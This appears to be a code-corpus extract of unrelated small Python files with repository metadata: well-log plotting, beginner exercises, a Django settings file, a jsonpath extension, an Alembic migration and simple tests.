#T2 TEST DATA # %% import pandas as pd import numpy as np import matplotlib.pyplot as plt import pickle from scipy import interpolate from scipy.integrate import simps from numpy import trapz # %% #Load Stack UVStack = pd.read_excel('./ML_Results/T2_test/ImgStack.xls') ImgStackk = UVStack.copy().to_numpy() # %% def integrate(y_vals, h): i = 1 total = y_vals[0] + y_vals[-1] for y in y_vals[1:-1]: if i % 2 == 0: total += 2 * y else: total += 4 * y i += 1 return total * (h / 3.0) # %% Load and resample "results" (res) file sub = pd.read_excel('./ML_Results/T2_test/sub.xls') res = pd.read_excel('./ML_Results/T2_test/Results.xls') res = res[res.Well == 'T2'] res.sort_values(by=['DEPT']) res.drop(['Unnamed: 0', 'Set'], axis=1, inplace=True) res.reset_index(inplace=True, drop=True) dep = np.arange(min(res.DEPT), max(res.DEPT),0.5) #res is not at 0.5 thanks to balancing res_rs = pd.DataFrame(columns=[res.columns]) res_rs.DEPT = dep for i in range(len(res.columns)): if i != 8: f = interpolate.interp1d(res.DEPT, res.iloc[:,i]) res_rs.iloc[:,i] =f(dep) else: res_rs.iloc[:,i] = res.Well[0] #T2_rs.dropna(inplace=True) res = res_rs.copy() difference = res.DEPT.diff() difference.describe() # %% TT = pd.read_excel('./ML_Results/Train_Test_Results.xls') istr = 0 iend = 42344 dplot_o = 3671 dplot_n = 3750 shading = 'bone' # %% Load Log Calculations T2_x = pd.read_excel('./Excel_Files/T2.xls',sheet_name='T2_data') T2_x = T2_x[['DEPTH','GR_EDTC','RHOZ','AT90','NPHI','Vsh','Vclay','grain_density','porosity', 'RW2','Sw_a','Sw_a1','Sw_p','Sw_p1','SwWS','Swsim','Swsim1','PAY_archie', 'PAY_poupon','PAY_waxman','PAY_simandoux']] # %% T2_rs = pd.DataFrame(columns=[T2_x.columns]) T2_rs.iloc[:,0] = dep for i in range(len(T2_x.columns)): f = interpolate.interp1d(T2_x.DEPTH, T2_x.iloc[:,i]) T2_rs.iloc[:,i] =f(dep) #T2_rs.dropna(inplace=True) T2_x = T2_rs.copy() difference_T2 = T2_x.DEPTH.diff() difference.describe() # %% plt.figure() plt.subplot2grid((1, 10), (0, 0), colspan=3) plt.plot(sub['GRAY'], sub['DEPTH'], 'mediumseagreen', linewidth=0.5); plt.axis([50, 250, dplot_o, dplot_n]); plt.gca().invert_yaxis(); plt.fill_between(sub['GRAY'], 0, sub['DEPTH'], facecolor='green', alpha=0.5) plt.xlabel('Gray Scale RGB') plt.subplot2grid((1, 10), (0, 3), colspan=7) plt.imshow(ImgStackk[istr:iend,80:120], aspect='auto', origin='upper', extent=[0,1,dplot_n,dplot_o], cmap=shading); plt.axis([0, 1, dplot_o, dplot_n]); plt.gca().invert_yaxis() plt.xlabel('Processed Image') plt.colorbar() p_50 = np.percentile(sub['DEPTH'], 50) plt.yticks([]); plt.xticks([]) plt.subplots_adjust(wspace = 20, left = 0.1, right = 0.9, bottom = 0.1, top = 0.9) plt.show() # %% CORE =pd.read_excel('./CORE/CORE.xlsx',sheet_name='XRD') mask = CORE.Well.isin(['T2']) T2_Core = CORE[mask] prof=T2_Core['Depth'] clays=T2_Core['Clays'] xls1 = pd.read_excel ('./CORE/CORE.xlsx', sheet_name='Saturation') mask = xls1.Well.isin(['T2']) T2_sat = xls1[mask] long=T2_sat ['Depth'] poro=T2_sat ['PHIT'] grain=T2_sat ['RHOG'] sw_core=T2_sat ['Sw'] klinkenberg = T2_sat ['K'] minimo=grain.min() maximo=grain.max() c=2.65 d=2.75 norm=(((grain-minimo)*(d-c)/(maximo-minimo))+c) xls2 = pd.read_excel ('./CORE/CORE.xlsx', sheet_name='Gamma') mask = xls2.Well.isin(['T2']) T2_GR = xls2[mask] h=T2_GR['Depth'] cg1=T2_GR['GR_Scaled'] # %% # ~~~~~~~~~~~~~~~~~~ Plot Results ~~~~~~~~~~~~~~~~~~~~~~ ct = 0 top= dplot_o bottom= dplot_n no_plots = 9 ct+=1 plt.figure(figsize=(10,9)) plt.subplot(1,no_plots,ct) plt.plot (T2_x.GR_EDTC,T2_x.DEPTH,'g', lw=3) #plt.fill_between(T2_x.GR_EDTC.values.reshape(-1), T2_x.DEPTH.values.reshape(-1), y2=0,color='g', alpha=0.8) plt.title('$GR/ Core.GR $',fontsize=8) plt.axis([40,130,top,bottom]) plt.xticks(fontsize=8) plt.yticks(fontsize=8) plt.xlabel('Gamma Ray ',fontsize=6) plt.gca().invert_yaxis() plt.grid(True) plt.hlines(y=3665.65, xmin=0, xmax=130) plt.hlines(y=3889.5, xmin=0, xmax=130) ct+=1 plt.subplot(1,no_plots,ct) plt.plot (T2_x.PAY_poupon,T2_x.DEPTH,'r',lw=0.5) h_P = integrate(T2_x.PAY_poupon.values, 0.5) plt.title('$PAY_P$',fontsize=8) plt.fill_between(T2_x.PAY_poupon.values.reshape(-1),T2_x.DEPTH.values.reshape(-1), color='r', alpha=0.8) plt.axis([0.01,0.0101,top,bottom]) plt.xticks(fontsize=8) plt.gca().invert_yaxis() plt.gca().xaxis.set_visible(False) plt.gca().yaxis.set_visible(False) plt.grid(True) plt.hlines(y=3665.65, xmin=0, xmax=130) plt.hlines(y=3889.5, xmin=0, xmax=130) #Waxman-Smits ct+=1 plt.subplot(1,no_plots,ct) plt.plot (T2_x.PAY_waxman,T2_x.DEPTH,'g',lw=0.5) h_WS = integrate(T2_x.PAY_waxman.values, 0.5) plt.title('$PAY_W$',fontsize=8) plt.fill_between(T2_x.PAY_waxman.values.reshape(-1),T2_x.DEPTH.values.reshape(-1), color='g', alpha=0.8) plt.axis([0.01,0.0101,top,bottom]) plt.xticks(fontsize=8) plt.gca().invert_yaxis() plt.gca().xaxis.set_visible(False) plt.gca().yaxis.set_visible(False) plt.grid(True) plt.hlines(y=3665.65, xmin=0, xmax=130) plt.hlines(y=3889.5, xmin=0, xmax=130) #Simandoux ct+=1 plt.subplot(1,no_plots,ct) plt.plot (T2_x.PAY_simandoux,T2_x.DEPTH,'y',lw=0.5) h_S = integrate(T2_x.PAY_simandoux.values, 0.5) plt.title('$PAY_S$',fontsize=8) plt.fill_between(T2_x.PAY_simandoux.values.reshape(-1),T2_x.DEPTH.values.reshape(-1), color='y', alpha=0.8) plt.axis([0.01,0.0101,top,bottom]) plt.xticks(fontsize=8) plt.gca().invert_yaxis() plt.gca().xaxis.set_visible(False) plt.gca().yaxis.set_visible(False) plt.grid(True) plt.hlines(y=3665.65, xmin=0, xmax=130) plt.hlines(y=3889.5, xmin=0, xmax=130) ct+=1 #RGB Gray from Image plt.subplot(1,no_plots,ct) plt.plot(sub['GRAY'], sub['DEPTH'], 'mediumseagreen', linewidth=0.5); plt.axis([50, 250, dplot_o, dplot_n]); plt.xticks(fontsize=8) plt.title('$Core Img$',fontsize=8) plt.gca().invert_yaxis(); plt.gca().yaxis.set_visible(False) plt.fill_between(sub['GRAY'], 0, sub['DEPTH'], facecolor='green', alpha=0.5) plt.xlabel('Gray Scale RGB', fontsize=7) ct+=1 # True UV from Image plt.subplot(1,no_plots,ct, facecolor='#302f43') corte= 170 PAY_Gray_scale = res['GRAY'].copy() PAY_Gray_scale.GRAY[PAY_Gray_scale.GRAY<corte] = 0 PAY_Gray_scale.GRAY[PAY_Gray_scale.GRAY>=corte] = 1 h_TRUE_UV = integrate(PAY_Gray_scale.values, 0.5) plt.plot (PAY_Gray_scale,res.DEPT,'#7d8d9c',lw=0.5) plt.title('$OBJETIVO$',fontsize=8) plt.fill_between(PAY_Gray_scale.values.reshape(-1),res.DEPT.values.reshape(-1), color='#7d8d9c', alpha=0.8) plt.axis([0.01,0.0101,top,bottom]) plt.xticks(fontsize=8) plt.gca().invert_yaxis() plt.gca().xaxis.set_visible(False) plt.gca().yaxis.set_visible(False) plt.grid(True) plt.xlabel('Resolution to Log Scale',fontsize=7) ct+=1 plt.subplot(1,no_plots,ct) plt.imshow(ImgStackk[istr:iend,80:120], aspect='auto', origin='upper', extent=[0,1,dplot_n,dplot_o], cmap=shading); plt.axis([0, 1, dplot_o, dplot_n]); plt.xticks(fontsize=8) plt.gca().invert_yaxis() plt.xlabel('Stacked UV Photos', fontsize=7) plt.colorbar() p_50 = np.percentile(sub['DEPTH'], 50) plt.yticks([]); plt.xticks([]) ct+=1 plt.subplot(1,no_plots,ct) plt.plot (res['RandomForest'],res.DEPT,'r',lw=1) plt.plot (res.GRAY,res.DEPT,'k',lw=0.5) plt.title('Machine Learning',fontsize=8) plt.axis([0,2,top,bottom]) plt.xticks(fontsize=8) plt.xlabel('RandomForest',fontsize=7) plt.gca().invert_yaxis() plt.gca().invert_xaxis() plt.gca().yaxis.set_visible(False) plt.grid(True) plt.xlim(0, 255) plt.hlines(y=3665.65, xmin=0, xmax=130) plt.hlines(y=3889.5, xmin=0, xmax=130) ct+=1 plt.subplot(1,no_plots,ct, facecolor='#302f43') PAY_Gray_scale2 = res['RandomForest'].copy().rename(columns={'RandomForest':'GRAY'}) PAY_Gray_scale2.GRAY[PAY_Gray_scale2.GRAY<corte] = 0 PAY_Gray_scale2.GRAY[PAY_Gray_scale2.GRAY>=corte] = 1 h_ML = integrate(PAY_Gray_scale2.values, 0.5) plt.plot (PAY_Gray_scale2, res.DEPT,'#7d8d9c',lw=0.5) plt.title('$RESULTADO: TEST Set$',fontsize=8) plt.fill_between(PAY_Gray_scale2.values.reshape(-1),res.DEPT.values.reshape(-1), color='#7d8d9c', alpha=0.8) plt.axis([0.01,0.0101,top,bottom]) plt.xticks(fontsize=8) plt.gca().invert_yaxis() plt.gca().xaxis.set_visible(False) plt.gca().yaxis.set_visible(False) plt.grid(True) plt.suptitle('Pozo T2: Comparación Final') plt.show() # %% # %% plt.figure(figsize=(10,9)) plt.subplot(1,1,1) plt.plot(res.GRAY, res['RandomForest'], 'ko') plt.plot(res.GRAY, res.GRAY, 'r') plt.xlim(0, 255) plt.ylim(0, 255) plt.xlabel('Valor en Escala de Gris Suavizado a res. de Registros',fontsize=17) plt.ylabel('Predicción de Escala de Gris usando Random Forest',fontsize=17) plt.show() # %% Erro Calculation # T2_x.PAY_poupon,T2_x.DEPTH # T2_x.PAY_waxman # T2_x.PAY_simandoux def integrate(y_vals, h): i = 1 total = y_vals[0] + y_vals[-1] for y in y_vals[1:-1]: if i % 2 == 0: total += 2 * y else: total += 4 * y i += 1 return total * (h / 3.0) # %% pay = pd.DataFrame(columns=['Poupon', 'Waxman_Smits', 'Simandoux', 'Machine_L', 'True_UV']) pay.Poupon = h_P pay.Waxman_Smits = h_WS pay.Simandoux = h_S pay.Machine_L = h_ML pay.True_UV = h_TRUE_UV pay.head() #rmse['Poupon'] = mean_squared_error(y_test, y_pred_test, squared=False) # %%
b1a7fc689b623866f4aec9ced8da6ca250e1cc48
e5cd01fd620e8e746a20b883de7ac32bec4feb5c
/Ejercicios python/PE7/PE7E4.py
1b13263e7dde6dfb7f5fa46c512b4da81767aed9
[]
no_license
eazapata/python
0f6a422032d8fb70d26f1055dc97eed83fcdc572
559aa4151093a120527c459a406abd8f2ff6a7d8
refs/heads/master
2020-08-27T09:19:29.395109
2019-11-23T20:11:14
2019-11-23T20:11:14
217,314,818
0
0
null
null
null
null
UTF-8
Python
false
false
422
py
#Escribe un programa que pida una frase, y le pase como #parámetro a una función dicha frase. La función debe #sustituir todos los espacios en blanco de una frase #por un asterisco, y devolver el resultado para que el #programa principal la imprima por pantalla. def quitaespacio(x): x=x.replace(" ","*"); return (x) frase=str(input("Escribe una frase: ")) sinespacios=quitaespacio(frase) print(sinespacios)
1f35b67c23f1552af6886e53be9c92cde29f3333
fcb5267ea83fe2f15922b5f405e534d5c37bd560
/day21/day21a_ext.py
249175f48203607f0023520fd97cc3348b92a4b2
[ "MIT" ]
permissive
kannix68/advent_of_code_2019
b3d02b695a167028bd09e72a224d89680844aade
b02a86e1f8e83111973cc2bc8c7f4d5dcf1c10aa
refs/heads/master
2020-09-30T16:33:47.871407
2020-01-10T21:00:50
2020-01-10T21:00:50
227,325,884
0
0
null
null
null
null
UTF-8
Python
false
false
1,281
py
# external solution by mcpower # see: https://github.com/mcpower/adventofcode # name input as input.txt import sys; sys.dont_write_bytecode = True; from utils import * """ Strings, lists, dicts: lmap, ints, positive_ints, floats, positive_floats, words Data structures: Linked, UnionFind dict: d.keys(), d.values(), d.items() deque: q[0], q.append and q.popleft List/Vector operations: GRID_DELTA, OCT_DELTA lget, lset, fst, snd padd, pneg, psub, pmul, pdot, pdist1, pdist2sq, pdist2 Matrices: matmat, matvec, matexp """ from intcodev1 import * def do_case(inp: str, sample=False): # READ THE PROBLEM FROM TOP TO BOTTOM OK def sprint(*a, **k): sample and print(*a, **k) lines = inp.splitlines() prog = Intcode(ints(inp)) # prog.run_interactive() MY_PROG = """ NOT A T OR T J NOT B T OR T J NOT C T OR T J NOT D T NOT T T AND T J WALK """.strip() + "\n" inputs = list(map(ord, MY_PROG)) halted, output = prog.run_multiple(inputs) Intcode.print_output(output) return # RETURNED VALUE DOESN'T DO ANYTHING, PRINT THINGS INSTEAD run_samples_and_actual([ # Part 1 r""" """,r""" """,r""" """,r""" """,r""" """,r""" """,r""" """],[ # Part 2 r""" """,r""" """,r""" """,r""" """,r""" """,r""" """,r""" """], do_case)
2a91321f84c7bf043df76df27261026d41dd5a72
b0475ce87641476199f8c46aa3adb9e56e1061fc
/jsonpath_ng/ext/string.py
d463967aaa487e42e9bbc3c56cdd08bc75ab4329
[ "Apache-2.0" ]
permissive
antonstakhouski/jsonpath-ng
0acca321022de418fd779923ac8b830b77b0046f
8cacb50796e250a4f9fab0ca0ccf3b20cf082fd8
refs/heads/master
2022-01-06T22:39:35.044002
2019-06-27T14:12:57
2019-06-27T14:12:57
274,714,446
1
0
Apache-2.0
2020-06-24T16:17:52
2020-06-24T16:17:52
null
UTF-8
Python
false
false
2,598
py
# # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import re from .. import DatumInContext, This SUB = re.compile("sub\(/(.*)/,\s+(.*)\)") SPLIT = re.compile("split\((.),\s+(\d+),\s+(\d+|-1)\)") class DefintionInvalid(Exception): pass class Sub(This): """Regex subtituor Concrete syntax is '`sub(/regex/, repl)`' """ def __init__(self, method=None): m = SUB.match(method) if m is None: raise DefintionInvalid("%s is not valid" % method) self.expr = m.group(1).strip() self.repl = m.group(2).strip() self.regex = re.compile(self.expr) self.method = method print("%r" % self) def find(self, datum): datum = DatumInContext.wrap(datum) value = self.regex.sub(self.repl, datum.value) if value == datum.value: return [] else: return [DatumInContext.wrap(value)] def __eq__(self, other): return (isinstance(other, Sub) and self.method == other.method) def __repr__(self): return '%s(%r)' % (self.__class__.__name__, self.method) def __str__(self): return '`sub(/%s/, %s)`' % (self.expr, self.repl) class Split(This): """String splitter Concrete syntax is '`split(char, segment, max_split)`' """ def __init__(self, method=None): m = SPLIT.match(method) if m is None: raise DefintionInvalid("%s is not valid" % method) self.char = m.group(1) self.segment = int(m.group(2)) self.max_split = int(m.group(3)) self.method = method def find(self, datum): datum = DatumInContext.wrap(datum) try: value = datum.value.split(self.char, self.max_split)[self.segment] except Exception: return [] return [DatumInContext.wrap(value)] def __eq__(self, other): return (isinstance(other, Sub) and self.method == other.method) def __repr__(self): return '%s(%r)' % (self.__class__.__name__, self.method) def __str__(self): return '`%s`' % self.method
de3c13459fa4c91f66c0dd232ec9b25575a4fe77
857b8979e587a5993a3362ae267a90b218413518
/Warmup/timeconversion.py
968831656e7611361c7a358102cb89edc4eebf59
[]
no_license
GRinaldi97/PCSIIH2
08074ec0f696110f4ea0c8dce10d2f7d91a9b25f
dc8791aa226441ea6587335e2e6fcd9a0473bb27
refs/heads/master
2021-05-06T20:30:03.877828
2017-11-28T09:52:20
2017-11-28T09:52:20
112,308,371
0
0
null
null
null
null
UTF-8
Python
false
false
420
py
#!/bin/python3 import sys def timeConversion(s): L=s.split(":") if L[-1][-2:] =='AM': if L[0]=="12": L[0]="00" L[-1]= L[-1][:2] else: if (int(L[0]))==12: L[-1]= L[-1][:2] else: L[0] = str(int(L[0])+ 12) L[-1]= L[-1][:2] return ":".join(L) s = input().strip() result = timeConversion(s) print(result)
def169ee9056eaa842fac83a407d9e4fe98eadd5
3319aeddfb292f8ab2602840bf0c1e0c2e5927be
/python/fp/lists.py
ccb0c857fc2aa5458d4ad2cadced3d896d8aca44
[]
no_license
slaash/scripts
4cc3eeab37f55d822b59210b8957295596256936
482fb710c9e9bcac050384fb5f651baf3c717dac
refs/heads/master
2023-07-09T12:04:44.696222
2023-07-08T12:23:54
2023-07-08T12:23:54
983,247
4
2
null
null
null
null
UTF-8
Python
false
false
79
py
#!/usr/bin/python l=range(0,100) i=iter(l) for i in iter(l): print(i)
ae860b7bf43311fe416a63cf0c493b2ed218d7f5
2de130eadae04a40884c2692a13d7999621dfd9f
/Python/Tarea/Guia2/3_fecha_como_cadena.py
7fcc5526521b8893744116df0fcd6b3b5b9db0a7
[ "MIT" ]
permissive
marce1994/Learning
e11e33496f6a536e9d64cb015fa90ff4dd9ce2cf
2b5928cf16c0d25bfc130ad4df9d415475395ec3
refs/heads/main
2023-06-17T11:35:14.308755
2021-07-22T15:34:07
2021-07-22T15:34:07
373,610,558
0
0
null
null
null
null
UTF-8
Python
false
false
372
py
cadena_ingresada = input("Ingrese la fecha actual en formato dd/mm/yyyy: "); separado = cadena_ingresada.split('/'); print(separado); print( f'Dia: {separado[0]}', '-', f'Mes: {separado[1]}', '-', f'Anio: {separado[2]}' ); c = cadena_ingresada; print( f'Dia: {c[0]}{c[1]}', '-', f'Mes: {c[3]}{c[4]}', '-', f'Anio: {c[6]}{c[7]}{c[8]}{c[9]}' );
dc9873589ffbfb60b12635001740f6860f245eb0
c6442366f1791a3e384a7298b41a70bcda6d0107
/fahtocel.py
828f4ed97c583c72bdc3b7cbe7da4a979bb72406
[]
no_license
srikrishna777/python
eb8970ad9b22e5f836627bb36e152d0a26dc4526
78f56724d722676ef3fe2ee0ebe3bebbfd9ecb56
refs/heads/master
2023-06-14T08:20:38.214513
2021-07-14T15:50:24
2021-07-14T15:50:24
292,761,941
3
0
null
null
null
null
UTF-8
Python
false
false
126
py
Fahrenheit =int(input("Enter Fahrenheit: ")) Celsius = (Fahrenheit - 32) * 5/9 print("the value of Celsius is" ,Celsius)
bbddaea0e02684bcad5e5059bded52512c484070
a23ee3eb7218985cc9297faef698d3d5651565d2
/recipe_fork/recipe_fork/settings.py
69e0407485934862c82e25dbb3852f569dd48437
[]
no_license
suxxxoi/recipe_fork
ea402eec5657af0978d90c1fcc308f34358f8741
04d80c1402a0f6acbfc989076f6474245eac1b25
refs/heads/master
2023-01-23T03:22:51.913739
2020-12-02T10:56:48
2020-12-02T10:56:48
284,443,587
0
0
null
null
null
null
UTF-8
Python
false
false
3,406
py
""" Django settings for recipe_fork project. Generated by 'django-admin startproject' using Django 3.0.8. For more information on this file, see https://docs.djangoproject.com/en/3.0/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.0/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '0(3nuwepfk_x!@-vi)(x&e47y(bbtzfk!2h2)obw#7hguyl*o)' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'user.apps.UserConfig', 'user_index.apps.UserIndexConfig', 'recipe.apps.RecipeConfig', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'recipe_fork.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'recipe_fork.wsgi.application' # Database # https://docs.djangoproject.com/en/3.0/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.0/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.0/howto/static-files/ STATIC_URL = '/static/' # Redirect to home URL after login (Default redirects to /accounts/profile/) LOGIN_REDIRECT_URL = '/' EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
d2f43ec0f5c50ef641f8a57903e8005945738a71
3a462a714408cc0f5c01d1336f301ed1ba30a53e
/strategy.py
4c87c6c45667a9b85a393a60285cbaae030c675b
[]
no_license
opz/gdax_order_book_trader
ee23e7e0be880042ec6cf83571b322351cf5ba50
fe9253a18d011dab110950774002f242d7cf2b1f
refs/heads/master
2018-10-14T03:04:44.239295
2017-12-01T16:56:29
2017-12-01T16:56:29
112,248,110
1
0
null
null
null
null
UTF-8
Python
false
false
2,078
py
from decimal import Decimal, InvalidOperation import logging logger = logging.getLogger(__name__) class Strategy: """ Base class for trading strategy implementations Attributes: trader: An instance of :class:`GDAXTrader`. accounts: GDAX account data bid_orders: GDAX order book bid data ask_orders: GDAX order book ask data """ def __init__(self): self.trader = None self.accounts = [] self.bid_orders = None self.ask_orders = None self.set_up() def set_up(self): """ Override in child class to run code on initialization """ pass def add_trader(self, trader): self.trader = trader def next(self): """ Must be implemented by child class Strategy logic goes in this method. The instance variable dictionaries available to strategies have the following fields: accounts: - id - currency - balance - available - hold - profile_id """ raise NotImplementedError def next_data(self, accounts, bid_orders, ask_orders): """ Set data to be used for the current strategy iteration :param accounts: accounts data :param bid_orders: order book bid data :param ask_orders: order book ask data """ self.accounts = accounts self.bid_orders = bid_orders self.ask_orders = ask_orders def get_currency_balance(self, currency): """ Get the current account balance for a currency :param currency: the currency to get the balance for :returns: the balance of the account """ for account in self.accounts: try: if account['currency'] == currency: return Decimal(account['balance']) except (KeyError, TypeError, InvalidOperation): continue return Decimal(0)
ef9bfca4ec8c994e9d2c9fc630c5971675320583
01457e05d0b550eccf2d677e78d04d032326288d
/migrations/versions/f743ab141e32_posts_table.py
d9e63340ab53d1e87ae6f89aab8e7c9e60e75142
[]
no_license
nessig12/Connect21
d87e2ca18101777e05cc7c2493bd5a8969115107
c5dd30fdf8de34625f4d0049534df7e8f586427d
refs/heads/master
2022-12-10T11:57:35.365588
2020-04-24T20:27:59
2020-04-24T20:27:59
203,684,184
1
0
null
null
null
null
UTF-8
Python
false
false
1,057
py
"""posts table Revision ID: f743ab141e32 Revises: 8f164b7b3fc3 Create Date: 2020-02-05 16:19:35.074665 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = 'f743ab141e32' down_revision = '8f164b7b3fc3' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('post', sa.Column('id', sa.Integer(), nullable=False), sa.Column('body', sa.String(length=140), nullable=True), sa.Column('timestamp', sa.DateTime(), nullable=True), sa.Column('user_id', sa.Integer(), nullable=True), sa.ForeignKeyConstraint(['user_id'], ['user.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index(op.f('ix_post_timestamp'), table_name='post') op.drop_table('post') # ### end Alembic commands ###
7c545b2539b091a80362983c3601a5370b3900d0
5869de949e274cbaa016bfd52b5b4ab9814de49f
/utils/tester.py
0598481151fb1aec9ca493e6a4a1aa90491f7908
[]
no_license
samherring99/ContentBasedMIR
018a59e8b90f3715ef93fb6c80ec7ee9cf2ed7ad
787e53f4b1896fb95d66ce110ce4327571b64a4b
refs/heads/master
2022-06-12T04:45:23.900073
2020-05-06T17:04:49
2020-05-06T17:04:49
261,822,363
0
0
null
null
null
null
UTF-8
Python
false
false
495
py
import csv with open('fma_metadata/tracks.csv') as csv_file: csv_reader = csv.reader(csv_file, delimiter=',') line_count = 2 for row in csv_reader: if line_count == 2: #print(f'Column names are {", ".join(row)}') line_count += 1 else: if str(row[40]) != "": thing = row[0].zfill(6) print(f'\t{thing} {row[40]}') line_count += 1 #print(f'Processed {line_count} lines.')
ab490c6822ee354cc666f436e00aa5657b6a6e99
dd0cb8b8e7658ae639961cda37397a1e8ea6f4b1
/test/test_sim_config.py
6620e507a846a713407dbb63fc1f877b0f9e1c41
[]
no_license
jamesprinc3/data-analysis
271b234375b7943770a45718685a4cb708e278b1
ba3cb56bd05318921e12c4be9600e6ac069d1f14
refs/heads/master
2020-03-07T23:32:17.912776
2018-06-25T10:33:45
2018-06-25T10:33:45
127,784,050
0
0
null
null
null
null
UTF-8
Python
false
false
1,371
py
from unittest import TestCase from sim_config import SimConfig class TestGenerateConfigString(TestCase): def setUp(self): pass def test_generate_str(self): config = {'paths': {'testPath': "test/path"}} config_str = SimConfig.generate_config_string(config) assert config_str == "paths {\n\ttestPath = \"test/path\"\n}" def test_generate_int(self): config = {'execution': {'numSimulations': 10}} config_str = SimConfig.generate_config_string(config) assert config_str == "execution {\n\tnumSimulations = 10\n}" def test_generate_bool(self): config = {'execution': {'parallel': True}} config_str = SimConfig.generate_config_string(config) assert config_str == "execution {\n\tparallel = true\n}" def test_generate_two_params(self): config = {'execution': {'numSimulations': 10, 'parallel': True}} config_str = SimConfig.generate_config_string(config) assert config_str == "execution {\n\tnumSimulations = 10,\n\tparallel = true\n}" def test_generate_two_sections(self): config = {'execution': {'numSimulations': 10}, 'paths': {'testPath': "test/path"}} config_str = SimConfig.generate_config_string(config) assert config_str == "execution {\n\tnumSimulations = 10\n}\n\npaths {\n\ttestPath = \"test/path\"\n}"
b9aaf73be86b80c86bd56f0ca20545750714ee9d
66757f36d5e9482058d4283835ab6534e92b48d8
/Back/glucose/models.py
23b1ea45b271f6bea89556f8f5aef2bbc29617b0
[]
no_license
baldiniyuri/ihealth
4155a008cb7ce9d3b8ccf5313cde171f45e2ebb8
dedf421593e503bb80f92bb9b5cff95fbedddb75
refs/heads/master
2023-06-21T23:54:50.052907
2021-07-22T19:22:02
2021-07-22T19:22:02
388,496,360
0
0
null
null
null
null
UTF-8
Python
false
false
240
py
from django.db import models from authentication.models import User class Glucose(models.Model): user = models.ForeignKey(User, on_delete=models.CASCADE) glucose = models.IntegerField() date_time = models.DateTimeField()
2ca84c0f31091c70c2f07ff54c5f0e2242ac4d07
6818c057f2f6635979400133ef4557f0feae0f9b
/manage.py
e03ca74e91f9550cb5c9ba5be9848a1e5c47ef8e
[]
no_license
MGoss115/parentingapp
7094cd4bf7a19099e574dec871d86bffe9b15de2
518b12ad9f8f36383a9ce83269211ceb9fc080ff
refs/heads/main
2023-08-16T20:33:23.311835
2021-09-21T15:32:50
2021-09-21T15:32:50
401,867,458
0
0
null
null
null
null
UTF-8
Python
false
false
672
py
#!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): """Run administrative tasks.""" os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'parenting_django.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main()
1729d1308dd79975f42c02fcd155b256d5e09da2
9f12202bf41fb4a8fc36871aeae3834c55129bf2
/Interview Questions/Inorder Traversal of BST.py
c67319e4b4b23c2fa2cc95559dc85d8cadde1d8f
[]
no_license
veetarag/Data-Structures-and-Algorithms-in-Python
b8afebbcfc9146ed06efcf09b58c13c52e76b9ab
167240935d89df2ec6e2777dc561fabe0244c8a9
refs/heads/master
2022-11-15T07:38:31.309514
2020-07-04T01:54:30
2020-07-04T01:54:30
null
0
0
null
null
null
null
UTF-8
Python
false
false
428
py
# Definition for a binary tree node. class TreeNode(object): def __init__(self, x): self.val = x self.left = None self.right = None class Solution(object): def inorderTraversal(self, root): rst = [] def util(root): if root: util(root.left) rst.append(root.val) util(root.right) util(root) return rst
9253df4be11c51d42b256b0cb1030a6890b769a5
e8bd148169647433cedd8219833271e275044145
/client.py
5c0466242b044eb65c826fe436035bad6aafdacc
[]
no_license
marco2013/weather-cn
a752cb880f5d1c12ac11471f8214307b1f03411d
ecb7e8b9900342d89323234a575cf872f6c9ca04
